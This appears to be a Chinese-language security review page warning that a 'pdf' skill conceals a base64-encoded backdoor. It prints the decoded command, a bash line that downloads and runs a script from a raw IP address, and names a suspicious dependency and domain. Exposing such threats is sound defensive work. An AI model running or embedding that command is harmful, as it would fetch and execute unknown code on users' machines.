pdf

🚫 含恶意代码的PDF工具

🥥0总安装量 22评分人数 0
0% 的用户推荐

该技能伪装成PDF处理工具,实则包含base64隐藏的远程代码执行后门,会从可疑IP下载并执行未知脚本,存在严重安全风险。

D

高风险或信息不足,不建议直接接入业务环境

  • 来自社区或个人来源,建议先隔离验证
  • ❌ <br/>**检出远程代码执行**:第16-18行包含base64编码的恶意命令,解码后为`/bin/bash -c "$(curl -fsSL http://91.92.242.30/q0c7ew2ro8l2cfqp)"`,会从可疑IP下载并执行未知脚本
  • ❌ <br/>**检出欺骗性编码**:使用base64隐藏真实命令意图,故意逃避静态安全检测
  • ❌ <br/>**依赖不可信组件**:强制要求的"openclaw-core"来自个人GitHub账号,下载域名`setup-service.com`无可信背书
  • ❌ <br/>**来源完全不可信**:发布者(hightower6eu)和依赖作者(denboss99)均为个人账号,无组织背书
  • ⚠️ <br/>**权限过度申请**:要求系统级包管理器权限(apt-get/brew/choco),超出PDF处理功能合理范围

使用说明

技能概述

该技能表面提供PDF文档处理功能,包括文本提取、元数据查看、格式转换、合并拆分、OCR识别等常见操作。然而,经安全审查发现,其核心功能被恶意代码严重污染。

核心用法

技能文档声称支持以下操作:使用pdftotext提取文本、pdfinfo获取元数据、pdftoppm转换为图片、pdfunite合并文档、pdfseparate拆分页面、qpdf进行高级操作、以及ocrmypdf进行OCR识别。但这些功能都建立在一个名为"openclaw-core"的可疑组件之上。

显著优点

无。该技能不存在任何可信优点,其表面功能仅为掩盖恶意行为的幌子。

潜在缺点与局限性

1. 致命安全风险:包含经base64编码的恶意命令,会从http://91.92.242.30/q0c7ew2ro8l2cfqp下载并执行远程脚本
2. 供应链攻击:依赖的"openclaw-core"来自个人GitHub账号(denboss99),下载域名setup-service.com来源不明

3. 数据泄露风险:远程执行的脚本内容未知,可能包含键盘记录、数据窃取等恶意功能

4. 权限过度索取:要求系统级安装权限,远超PDF处理功能所需

5. 欺骗性设计:使用base64编码隐藏真实命令,故意逃避安全检查

适合的目标群体

不适合任何用户。无论个人开发者、企业用户还是安全研究人员,均应避免使用该技能。

使用风险

  • 即时系统危害:执行后将立即从不可信来源下载并运行未知代码
  • 持久化威胁:可能植入后门、木马或其他持久化恶意软件
  • 数据完全失控:PDF内容、系统文件、敏感信息均可能被窃取
  • 横向移动风险:若在企业内网使用,可能成为攻击跳板

替代方案

如需PDF处理功能,请直接使用官方工具:

  • apt-get install poppler-utils / brew install poppler(官方源)
  • pip install pypdf2 pdfplumber ocrmypdf(PyPI官方)
  • apt-get install qpdf(官方源)

pdf 内容

手动下载zip · 3.9 kB
SKILL.mdtext/markdown
请选择文件